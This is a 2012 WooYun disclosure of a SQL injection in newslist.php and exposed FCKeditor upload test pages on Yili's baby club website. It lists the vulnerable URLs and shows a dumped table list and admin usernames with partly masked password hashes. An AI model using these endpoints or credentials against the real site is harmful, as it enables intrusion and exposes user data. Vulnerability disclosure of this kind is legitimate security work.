伊利sql注入和test fckeditor | wooyun-2012-014760| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2012-014760

漏洞标题：伊利sql注入和test fckeditor

漏洞作者： luom

提交时间：2012-11-14 21:03

修复时间：2012-12-29 21:03

公开时间：2012-12-29 21:03

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2012-11-14：积极联系厂商并且等待厂商认领中，细节不对外公开
2012-12-29：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

伊利存在sql注射漏洞与fckeditor漏洞，可以成功利用进入后台。

详细说明：

http://yilibabyclub.yili.com/newslist.php?cid=22
newslist.php文件过滤不严导致注入
http://yilibabyclub.yili.com/fckeditor/editor/filemanager/connectors/uploadtest.html
http://yilibabyclub.yili.com/fckeditor/editor/filemanager/connectors/test.html
注入可得到用户和密码

current database:    'aierclub'
+-----------------------+
| aier_temptab          |
| yili_activity_cat     |
| yili_answers          |
| yili_articletags      |
| yili_attachments      |
| yili_attenction       |
| yili_category         |
| yili_collection_music |
| yili_editortmp        |
| yili_expert_advice    |
| yili_jf_adds          |
| yili_jf_area          |
| yili_jf_cary          |
| yili_jf_city          |
| yili_jf_conts         |
| yili_jf_history       |
| yili_jf_keywords      |
| yili_jf_order         |
| yili_jf_orderdetail   |
| yili_jf_pages         |
| yili_jf_province      |
| yili_logs             |
| yili_manager          |
| yili_music            |
| yili_pages            |
| yili_picture          |
| yili_picture_cat      |
......
......
......

[17:47:23] [INFO] retrieved: 0e27216391e1c9f78b2c8342********
[17:47:24] [INFO] retrieved: admin
[17:47:29] [INFO] retrieved: 0f1fc4043a5886b7be6a3f92********
[17:47:30] [INFO] retrieved: newsmanager    
[17:47:31] [INFO] retrieved: 47f98eb812f4c024f86aada4********
[17:47:32] [INFO] retrieved: aierfaq
[17:47:34] [INFO] retrieved: 70d945641e7ccb833de07054********
[17:47:35] [INFO] retrieved: aiernews
[17:47:36] [INFO] retrieved: add77e3e0a140b05da1f0dcb********
[17:47:36] [INFO] retrieved: loger    
[17:47:37] [INFO] retrieved: b81fd1b160bdebaaf3f1e377********
[17:47:37] [INFO] retrieved: weslywang
[17:47:38] [INFO] retrieved: c81feb1f2a863dc015f313e8********
[17:47:41] [INFO] retrieved: logs2

漏洞证明：

后台

修复方案：

密码强大点，过滤严一点，无用文件删一点，你比我多懂一点。

版权声明：转载请注明来源 luom@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝